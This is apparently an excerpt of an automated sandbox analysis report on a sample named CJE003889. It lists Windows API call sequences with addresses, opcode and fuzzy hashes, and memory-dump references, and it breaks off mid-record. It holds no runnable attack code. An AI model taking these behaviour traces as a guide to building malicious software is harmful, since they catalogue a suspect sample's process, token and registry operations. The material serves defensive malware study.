                                                          • Instruction Fuzzy Hash: 09616A3090065A9BCF11EF64CD82FFE37A9EF09308F044919F9556B292DB35E905EB54
                                                          APIs
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                            • Part of subcall function 00CE0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CDFDAD,?,?), ref: 00CE0E31
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CE02BD
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CE02FD
                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00CE0320
                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CE0349
                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CE038C
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00CE0399
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                          • String ID:
                                                          • API String ID: 4046560759-0
                                                          • Opcode ID: b5aec4ce7fedb6a52a656d1bf1215914b6505bdd939549cf182828de94395b2d
                                                          • Instruction ID: bf413758b2bfcdfe0d83a15516601d06e8b850e0da802d6ace674cb16a579c91
                                                          • Opcode Fuzzy Hash: b5aec4ce7fedb6a52a656d1bf1215914b6505bdd939549cf182828de94395b2d
                                                          • Instruction Fuzzy Hash: 05516A31208240AFC714EF65C885E6FBBE8FF84314F14492DF5958B2A2DB71E949DB92
                                                          APIs
                                                          • GetMenu.USER32(?), ref: 00CE57FB
                                                          • GetMenuItemCount.USER32(00000000), ref: 00CE5832
                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CE585A
                                                          • GetMenuItemID.USER32(?,?), ref: 00CE58C9
                                                          • GetSubMenu.USER32(?,?), ref: 00CE58D7
                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00CE5928
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountMessagePostString
                                                          • String ID:
                                                          • API String ID: 650687236-0
                                                          • Opcode ID: d1127aebed41114d53cd99cb8c53d345d536503287220e459e5b86fe9ce5d713
                                                          • Instruction ID: 21c623cf760f48b93200f8bd09b2d93e99d21ce01cba21b65d5f1380bd778adf
                                                          • Opcode Fuzzy Hash: d1127aebed41114d53cd99cb8c53d345d536503287220e459e5b86fe9ce5d713
                                                          • Instruction Fuzzy Hash: CD516F75E00655EFCF21EF65C885AAEB7B4EF48324F104069E851BB391CB70AE41DB90
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00CBEF06
                                                          • VariantClear.OLEAUT32(00000013), ref: 00CBEF78
                                                          • VariantClear.OLEAUT32(00000000), ref: 00CBEFD3
                                                          • _memmove.LIBCMT ref: 00CBEFFD
                                                          • VariantClear.OLEAUT32(?), ref: 00CBF04A
                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00CBF078
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                          • String ID:
                                                          • API String ID: 1101466143-0
                                                          • Opcode ID: 8c5cc4569ed17a414c05a63aa6d58db65b907211d1136082ce1aef2412696903
                                                          • Instruction ID: c437bb7b12aa274214bdd3599fa3dca97da57f3e1dbb58d01dd701fe2b205034
                                                          • Opcode Fuzzy Hash: 8c5cc4569ed17a414c05a63aa6d58db65b907211d1136082ce1aef2412696903
                                                          • Instruction Fuzzy Hash: 1F5168B5A00209EFCB10DF58D884AAAB7B8FF4C314F15856DE959DB351E330E912CBA0
                                                          APIs
                                                          • _memset.LIBCMT ref: 00CC2258
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC22A3
                                                          • IsMenu.USER32(00000000), ref: 00CC22C3
                                                          • CreatePopupMenu.USER32 ref: 00CC22F7
                                                          • GetMenuItemCount.USER32(000000FF), ref: 00CC2355
                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00CC2386
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                          • String ID:
                                                          • API String ID: 3311875123-0
                                                          • Opcode ID: 444d6d513ed7e2e64830d8ca979f1336877d248bea704c9e7967a065c6bcbedf
                                                          • Instruction ID: ecfaf75607a46206e25cc6ad8f2353bcc65ebfe4451dad64431f49a916d8603e
                                                          • Opcode Fuzzy Hash: 444d6d513ed7e2e64830d8ca979f1336877d248bea704c9e7967a065c6bcbedf
                                                          • Instruction Fuzzy Hash: ED51AE70601289DBDF21CF68C988FAEBBF9AF45314F18412DE861AB2A0D3749A45CB51
                                                          APIs
                                                            • Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623
                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00C6179A
                                                          • GetWindowRect.USER32(?,?), ref: 00C617FE
                                                          • ScreenToClient.USER32(?,?), ref: 00C6181B
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C6182C
                                                          • EndPaint.USER32(?,?), ref: 00C61876
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                          • String ID:
                                                          • API String ID: 1827037458-0
                                                          • Opcode ID: 15109219b52293441afc4557ff538dc5ecfddc1a6e14afbbc282c65a2e52a9e3
                                                          • Instruction ID: ebbc83cd4f194e486b5eae364968fdcd30df64d4dc9fe531273111676e65d695
                                                          • Opcode Fuzzy Hash: 15109219b52293441afc4557ff538dc5ecfddc1a6e14afbbc282c65a2e52a9e3
                                                          • Instruction Fuzzy Hash: 17418C30104740AFDB20DF25DCC8FBA7BE8EB59725F084668F9A5CB2A1C7709946DB61
                                                          APIs
                                                          • ShowWindow.USER32(00D257B0,00000000,00F96388,?,?,00D257B0,?,00CEB5A8,?,?), ref: 00CEB712
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00CEB736
                                                          • ShowWindow.USER32(00D257B0,00000000,00F96388,?,?,00D257B0,?,00CEB5A8,?,?), ref: 00CEB796
                                                          • ShowWindow.USER32(00000000,00000004,?,00CEB5A8,?,?), ref: 00CEB7A8
                                                          • EnableWindow.USER32(00000000,00000001), ref: 00CEB7CC
                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00CEB7EF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          • Opcode ID: dc966534e7223a25f52ca45f181970d91df6288420bd2685f64cf10d19955b5d
                                                          • Instruction ID: b6d41c95f405e61adc3f2cc86c81bbf3d7b5d17b1b0d0cd09601b5be6c92a31e
                                                          • Opcode Fuzzy Hash: dc966534e7223a25f52ca45f181970d91df6288420bd2685f64cf10d19955b5d
                                                          • Instruction Fuzzy Hash: 73419434600280EFDB26CF25C499BA67BE1FF45310F1841B9F9588FAA2C731AD56CB61
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00CD4E41,?,?,00000000,00000001), ref: 00CD70AC
                                                            • Part of subcall function 00CD39A0: GetWindowRect.USER32(?,?), ref: 00CD39B3
                                                          • GetDesktopWindow.USER32 ref: 00CD70D6
                                                          • GetWindowRect.USER32(00000000), ref: 00CD70DD
                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00CD710F
                                                            • Part of subcall function 00CC5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CC52BC
                                                          • GetCursorPos.USER32(?), ref: 00CD713B
                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CD7199
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                          • String ID:
                                                          • API String ID: 4137160315-0
                                                          • Opcode ID: a9c20956d57985e29db4d0491798b1822903fac056362b7655ac5b93af4e3d5b
                                                          • Instruction ID: f52ceb8fa3635240c2597dec8f3bf8ea9a708b6fb9be22691ead6891ec6849c5
                                                          • Opcode Fuzzy Hash: a9c20956d57985e29db4d0491798b1822903fac056362b7655ac5b93af4e3d5b
                                                          • Instruction Fuzzy Hash: 2B31A372505345ABD720DF14C849F5FB7E9FB88314F00061EF5999B291D770EA45CB92
                                                          APIs
                                                            • Part of subcall function 00CB80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CB80C0
                                                            • Part of subcall function 00CB80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CB80CA
                                                            • Part of subcall function 00CB80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CB80D9
                                                            • Part of subcall function 00CB80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CB80E0
                                                            • Part of subcall function 00CB80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CB80F6
                                                          • GetLengthSid.ADVAPI32(?,00000000,00CB842F), ref: 00CB88CA
                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00CB88D6
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00CB88DD
                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00CB88F6
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00CB842F), ref: 00CB890A
                                                          • HeapFree.KERNEL32(00000000), ref: 00CB8911
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                          • String ID:
                                                          • API String ID: 3008561057-0
                                                          • Opcode ID: b1f2a6fbfb40e6cb6edc85f4879bfe6737e4d43512ac4976a845c7348c219f4f
                                                          • Instruction ID: 631f0f81810250e07907f4e1fe34764a44c7b29bd41d1a40f12aaa3dc51514e8
                                                          • Opcode Fuzzy Hash: b1f2a6fbfb40e6cb6edc85f4879bfe6737e4d43512ac4976a845c7348c219f4f
                                                          • Instruction Fuzzy Hash: 2211AF31901209FFDF119FA4DC49BFE7B6CEB45311F10802DE89597150CB329A09DB60
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00CB85E2
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00CB85E9
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00CB85F8
                                                          • CloseHandle.KERNEL32(00000004), ref: 00CB8603
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CB8632
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00CB8646
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: 5f4e209c5268d64fbb5011381af6b19d08eb7ef7c9999737ccbb945ba08d15b7
                                                          • Instruction ID: 95b0be990600790f1f8de558992f5a6ab95e868e3cae789959b96d60d469c31f
                                                          • Opcode Fuzzy Hash: 5f4e209c5268d64fbb5011381af6b19d08eb7ef7c9999737ccbb945ba08d15b7
                                                          • Instruction Fuzzy Hash: 89114A7250124DABDF128FA4DD89FDE7BA9EF48304F044069FE04A6160C7718E65DB60
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 00CBB7B5
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CBB7C6
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CBB7CD
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00CBB7D5
                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00CBB7EC
                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 00CBB7FE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          • Opcode ID: 8b272515bf511ec6179e03109c054c4125debf3aa172a13243fbc85d17206d29
                                                          • Instruction ID: 97aefc822baa313914b91f03e98e0ac40ee962382176842555d4fba2f445d9a7
                                                          • Opcode Fuzzy Hash: 8b272515bf511ec6179e03109c054c4125debf3aa172a13243fbc85d17206d29
                                                          • Instruction Fuzzy Hash: 61018875E00249BBEB105BA69C85B9EBFB8EB48311F004075FA04EB291D6709D01CF61
                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C80193
                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C8019B
                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C801A6
                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C801B1
                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C801B9
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C801C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          • Opcode ID: 23673dbe6ee912c554e6984293ea55150f1f938bc266ab80b91062f4e4ddbbe8
                                                          • Instruction ID: 5db3780c99e6e348a8a6446e6d1746b31e023433c031197b8387fda6cf204ee7
                                                          • Opcode Fuzzy Hash: 23673dbe6ee912c554e6984293ea55150f1f938bc266ab80b91062f4e4ddbbe8
                                                          • Instruction Fuzzy Hash: 5D0148B09017597DE3008F5A8C85B56FEA8FF19354F00411BA1584B941C7B5A864CBE5
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CC53F9
                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CC540F
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00CC541E
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CC542D
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CC5437
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CC543E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 839392675-0
                                                          • Opcode ID: 40e766056ead83b23a641f23ed9bcd649fbb004413a58740c8b2eb537b80bfd1
                                                          • Instruction ID: ce2b063c7208204e52c7072a21a82d435fdb74646a83a9bc1fd903c13c656bac
                                                          • Opcode Fuzzy Hash: 40e766056ead83b23a641f23ed9bcd649fbb004413a58740c8b2eb537b80bfd1
                                                          • Instruction Fuzzy Hash: F8F03032241598BBE7215BA2DC4DFEF7B7CEFC6B11F00016DFA04D50A1D7A11A0286B5
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00CC7243
                                                          • EnterCriticalSection.KERNEL32(?,?,00C70EE4,?,?), ref: 00CC7254
                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00C70EE4,?,?), ref: 00CC7261
                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C70EE4,?,?), ref: 00CC726E
                                                            • Part of subcall function 00CC6C35: CloseHandle.KERNEL32(00000000,?,00CC727B,?,00C70EE4,?,?), ref: 00CC6C3F
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CC7281
                                                          • LeaveCriticalSection.KERNEL32(?,?,00C70EE4,?,?), ref: 00CC7288
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          • Opcode ID: 807b8e8e942fe35222ad5412b742ed15305c845153a9eeddbabb7a46eb83b5ca
                                                          • Instruction ID: 9c421bcfb971e3bdcbda79ddc6e899d6e95ad999a69ea5f704a57b37ffb6a39b
                                                          • Opcode Fuzzy Hash: 807b8e8e942fe35222ad5412b742ed15305c845153a9eeddbabb7a46eb83b5ca
                                                          • Instruction Fuzzy Hash: 78F05E36540752EBD7111B64ED8CFEE7729FF45702B110639F603990A1CB765902CB50
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CB899D
                                                          • UnloadUserProfile.USERENV(?,?), ref: 00CB89A9
                                                          • CloseHandle.KERNEL32(?), ref: 00CB89B2
                                                          • CloseHandle.KERNEL32(?), ref: 00CB89BA
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00CB89C3
                                                          • HeapFree.KERNEL32(00000000), ref: 00CB89CA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
                                                          • Opcode ID: bfaf944197f21bff3dc75c030e09dce5a3ae93a2248a2371a668a2d55edb7764
                                                          • Instruction ID: fcf2b51665098104378e41b582eb6f507e60da70d1562f68f49bf081e9908693
                                                          • Opcode Fuzzy Hash: bfaf944197f21bff3dc75c030e09dce5a3ae93a2248a2371a668a2d55edb7764
                                                          • Instruction Fuzzy Hash: 25E0C236004145FBDA021FE1EC4CB1EBB69FB89322B108238F219890B0CB329462DB50
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00CD8613
                                                          • CharUpperBuffW.USER32(?,?), ref: 00CD8722
                                                          • VariantClear.OLEAUT32(?), ref: 00CD889A
                                                            • Part of subcall function 00CC7562: VariantInit.OLEAUT32(00000000), ref: 00CC75A2
                                                            • Part of subcall function 00CC7562: VariantCopy.OLEAUT32(00000000,?), ref: 00CC75AB
                                                            • Part of subcall function 00CC7562: VariantClear.OLEAUT32(00000000), ref: 00CC75B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
